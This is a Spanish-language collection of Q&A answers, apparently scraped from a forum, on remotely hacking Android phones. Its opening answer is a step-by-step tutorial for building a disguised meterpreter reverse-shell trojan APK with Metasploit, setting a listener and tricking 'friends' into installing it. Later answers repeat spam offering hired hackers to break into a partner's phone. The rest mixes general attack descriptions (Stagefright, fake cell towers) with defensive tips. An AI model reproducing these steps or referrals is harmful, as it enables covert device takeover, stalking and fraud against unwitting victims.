¿Se puede hackear un teléfono Android de forma remota?

Encontré Cómo hackear Android usando Kali (remotamente) y pensé que podría ayudarte. Lo pegué para que lo use solo para que sea más fácil para usted.

Cómo hackear Android usando Kali (remotamente)

Hola hackers Bienvenido a mi segundo post:
Este es un tutorial que explica cómo hackear teléfonos Android con Kali.
No puedo ver ningún tutorial que explique este Hack / Exploit, así que hice uno.
( Aún así , es posible que ya sepas sobre esto )

Paso 1: Kali de encendido:

  • Abra una terminal y cree un troyano .apk
  • Puede hacer esto escribiendo:
  • msfpayload android / meterpreter / reverse_tcp LHOST = 192.168.0.4 R> /root/Upgrader.apk (reemplace LHOST con su propia IP)
  • También puede hackear Android en WAN, es decir, a través de Interet utilizando su IP pública / externa en el LHOST y mediante el reenvío de puertos (pregúnteme sobre el reenvío de puertos si tiene problemas en la sección de comentarios)

Paso 2: abra otra terminal:

  • Abra otra terminal hasta que se produzca el archivo.
  • Cargue la consola de metasploit, escribiendo: msfconsole

Paso 3: configurar un oyente:

  • Después de que se cargue (llevará tiempo), cargue el exploit de manejador múltiple escribiendo: use exploit / multi / handler

  • Configure una carga útil (inversa) escribiendo: set payload android / meterpreter / reverse_tcp
  • Para configurar el tipo de host L: configure LHOST 192.168.0.4 (Incluso si está pirateando WAN, escriba su IP privada / interna aquí, no la pública / externa)

Paso 4: ¡Explota!

  • En el último tipo: explotar para iniciar el oyente.
  • Copie la aplicación que creó (Upgrader.apk) de la carpeta raíz en su teléfono Android.

  • Luego, envíelo cargándolo en Dropbox o en cualquier sitio web para compartir (como: www.speedyshare.com).
  • Luego envíe el enlace que el sitio web le dio a sus amigos y explote sus teléfonos (solo en LAN, pero si utilizó el método WAN, puede utilizar el exploit en cualquier lugar de INTERNET)

  • Deje que la víctima instale la aplicación Upgrader (ya que él pensaría que está destinado a actualizar algunas funciones en su teléfono)
  • Sin embargo , la opción de asignación para la instalación de aplicaciones de fuentes desconocidas debe habilitarse (si no) desde la configuración de seguridad del teléfono Android para permitir la instalación del troyano.
  • Y cuando hace clic en Abrir …

Paso 5: ¡BOOM!

Llega el indicador de meterpreter:

Gracias,

-Brody

Sí, casi cualquier cosa puede ser pirateada de forma remota. Sin embargo, el teléfono tendría que estar conectado a Internet de alguna manera, o tener una tarjeta SIM para el servicio telefónico. Sin embargo, si quieres detalles, deberías analizar qué versión de Android se está ejecutando, qué vectores de ataque tienes, si el usuario está ejecutando algún tipo de antivirus y muchos otros factores.

Gracias por el A2A.

Hay una serie de ataques efectivos contra teléfonos Android. Demasiados para enumerar aquí. Te daré algunos ejemplos …

  • Una torre celular hostil falsa (piense raya) que proporcionó una conexión a Internet de 3g, y actuó como un MITM en llamadas telefónicas, mensajes de texto, tráfico de Internet, etc.
  • Un dispositivo Bluetooth hostil que pone un teléfono vulnerable en modo de depuración y accede a la guía telefónica, archivos, mensajes de texto, historial de llamadas, etc.
  • Una vulnerabilidad en la biblioteca multimedia que permitía un mensaje de texto entrante diseñado para entregar el control por teléfono al remitente. El objetivo no necesitaba abrir el texto, y el atacante podía eliminar el texto después de tomar el control.

El ataque MITM todavía es viable en los teléfonos actuales. El ataque de mensajes de texto fue parcheado en Android principal, pero no todos los fabricantes aplicaron el parche a todos los teléfonos en uso en ese momento. Eso significa que probablemente todavía hay teléfonos más antiguos en uso que son vulnerables. Es por eso que solo uso teléfonos que son compatibles (como Nexus) o que permiten cargar un firmware de terceros.

Sí. En el caso de Android 2.2 y versiones posteriores (la versión compilada de Google del sistema operativo Linux) hubo un exploit remoto muy definitivo, que aprovechó una vulnerabilidad de desbordamiento de enteros en la biblioteca de software de Android StageFright Core (Escrito en C ++, y parte de AOSP de Google (Androids Open Source Project)), que es un motor de back-end para formatos multimedia (Ej: archivos mp4), que permitió la ejecución remota de código y la escalada de privilegios locales a través de mensajes MMS especialmente diseñados.

A2A

Suponiendo que desea hackear en su dispositivo Android qué contraseña olvidó y ninguna otra intención maliciosa. O la carga útil de la red (si está conectada a Internet) o explotando una aplicación débilmente protegida. Hay un puñado de tutoriales sólidos en la web sobre cómo hacer ciertas tareas. Pero dos cosas son seguras. NECESITA estar conectado a la red a la que está conectado el teléfono y necesita tener un amplio conocimiento sobre la arquitectura de Android y la arquitectura de redes, para comenzar su aventura en el tema. ¡Buena suerte!

Nunca instale aplicaciones de terceros y software espía, aunque son realmente más simples de hacer, pero dejan un grave riesgo de ser atrapados y los delitos cibernéticos no son fáciles de evitar.

Hackear cualquier dispositivo Android podría ser una excelente manera de aprender exploits de seguridad en un dispositivo y realizarlo sin recibir aviso es realmente esencial para un hack exitoso. Recomendaría usar cualquier entorno de prueba de penetración para realizar cosas relacionadas con la piratería. Desde entonces, habrá miles de programas precargados que facilitarán su trabajo.

Prefiero kali linux para esto e incluso he creado un tutorial para realizar un ataque WAN simple en un dispositivo Android. Esto es solo para comprender los problemas de seguridad, no para cualquier trabajo ilegal.

La mayoría de los teléfonos Android pueden ser pirateados con un simple texto (artículo en línea de agosto de 2015)

descargue la aplicación Stagefright Detector y ejecútela en su dispositivo. Le dirá si es susceptible a ataques e incluso ajustará su configuración para brindarle alguna protección provisional

debe deshabilitar la recuperación automática de MMS para cualquier aplicación de mensajería que use. El correo electrónico personal gratuito de Microsoft tiene una guía paso a paso con capturas de pantalla para Hangouts y Messenger

Hackear cualquier dispositivo Android en 5 minutos | TUTORIAL

grupo oficial de pirateo de Facebook: –

Inicia sesión en Facebook | Facebook

canal de Youtube :-

TMH: Esto significa pirateo

No quiero escribir toda esa información en mis propias palabras, pero le proporcionaré una URL que le mostrará cómo hackear un teléfono Android.

El sitio web llamado Wonderhowto tiene muchos artículos sobre piratería en la sección de bytes nulos, así que visítelo una vez.

Cómo hackear Android usando Kali (remotamente)

El aspirante a hacker de sombrero blanco / patio de juegos de conciencia de seguridad “Null Byte :: WonderHowTo

Espero que entiendas por qué no tengo que escribir la respuesta.

Espero que te ayude con tu problema.

Sígueme para más respuestas.

Sí. El teléfono Android puede ser pirateado de forma remota y si uno no sigue las estrategias de seguridad, el pirata informático puede acceder a sus datos y puede causarle un gran daño.

¿Cómo se puede hackear un teléfono Android?

  1. Los piratas informáticos pueden usar troyanos o malware que transferirán silenciosamente el control de su teléfono al pirata informático.
  2. Hacker puede atacar la aplicación espía con cualquier aplicación que descargue de una tienda no oficial y eso arruinará su teléfono.
  3. Enlaces de spam.
  4. Usando la aplicación de la tienda no oficial. Algunos de ellos tienen códigos maliciosos y virus.
  5. Uso de aplicaciones agrietadas / anuladas.

Un artículo completo sobre ¿Alguien puede hackear mi teléfono de forma remota? le aclarará todas las formas posibles desde las cuales alguien puede controlar el teléfono móvil.

Sí, puede hacerlo con la ayuda de kali linux a través del marco de carga útil metasploit. Si quieres hacerlo, ve a YouTube y allí encontrarás muchos videos sobre este tutorial.

Sí, por supuesto. Wikileaks ha revelado muchos documentos que muestran exploits de día cero en muchas compañías como Microsoft, Apple y Google.

Un exploit de n días es aquel en el que un error se repite a una empresa y después de n días esos errores se harán públicos. Y con suerte estas compañías resolverían ese error en esos n días.

Un exploit de día cero es básicamente un error con el que una persona / hacker puede usar para obtener acceso al dispositivo en cualquier momento sin previo aviso.

Así que sí, todos los dispositivos son pirateables.

Aquí está un link del artículo.

WikiLeaks dará a los gigantes tecnológicos exploits de la CIA de día cero después de que satisfagan demandas misteriosas

echemos un vistazo desde esta perspectiva, qué pasa si su pareja realmente lo está engañando, cómo se sentirá y qué hará cuando se entere. Ahora la primera pregunta es, ¿cómo te enteras? ¿Cómo los atrapas en el acto?

Conozco un medio muy confiable que puedes usar para averiguar … puedes ir a Cyberhackersweb007 @gmail .com , él es un hacker privado que puede ingresar al teléfono de tu pareja de forma anónima

Funcionará, sin duda, y ahora, la segunda pregunta, ¿tiene tranquilidad después de descubrir o hacer algo de mierda?

Creo que la respuesta debería ser tranquilidad porque ahora sabes dónde te encuentras en el corazón de tu pareja

echemos un vistazo desde esta perspectiva, qué pasa si su pareja realmente lo está engañando, cómo se sentirá y qué hará cuando se entere. Ahora la primera pregunta es, ¿cómo te enteras? ¿Cómo los atrapas en el acto?

Conozco un medio muy confiable que puedes usar para averiguar … puedes ir a Cyberhackersweb007 @ gmail .com , él es un hacker privado que puede ingresar al teléfono de tu pareja de forma anónima

Funcionará, sin duda, y ahora, la segunda pregunta, ¿tiene tranquilidad después de descubrir o hacer algo de mierda?

Creo que la respuesta debería ser tranquilidad porque ahora sabes dónde te encuentras en el corazón de tu pareja

• ¿La pregunta es si los atrapaste o te lo confesó? Si los atrapaste, entonces quizás deberías perdonar y olvidar, pero si ella cometió ese error y te lo confesó y si ella es realmente culpable de lo que ha hecho, entonces quizás deberías perdonar, pero ahora de inmediato … tómate tu tiempo porque es se siente peor por haber sido engañado … comienzas a preguntarte qué te faltaba que la hizo cometer ese error … siempre recuerda que una persona no necesita engañarla a ella ni a su amante cuando pierden sus intereses … puede deberse a varios otros razones … conocerla, decirle que sea honesta y preguntarle por qué hizo eso. Y entonces obtendrás la respuesta si deberías perdonarla o no … ¡¿Qué se supone que debe ser? Buena suerte

Sí, puede hacerlo con la ayuda de kali linux a través del marco de carga útil metasploit. Si quieres hacerlo, ve a YouTube y allí encontrarás muchos videos sobre este tutorial.

Potencialmente, hay varios servicios como ‘encontrar mi teléfono’ que permiten el monitoreo y control remoto.

Si alguien encuentra una manera de manipularlos de una manera que no fue intencionada, entonces podría usarse para acceder al teléfono / tableta / televisor.

Pero hasta donde yo sé, no hay kits de guiones para niños para esto y si no hubiera nadie los compartiría con usted, de lo contrario, el agujero se remendaría.

Visite Noah’s Hack – Hackers de alquiler para obtener más información sobre esto

Sí, es posible Para aprender cómo, hay un tutorial en este sitio sobre tecnología de hacking ético. WordPress.com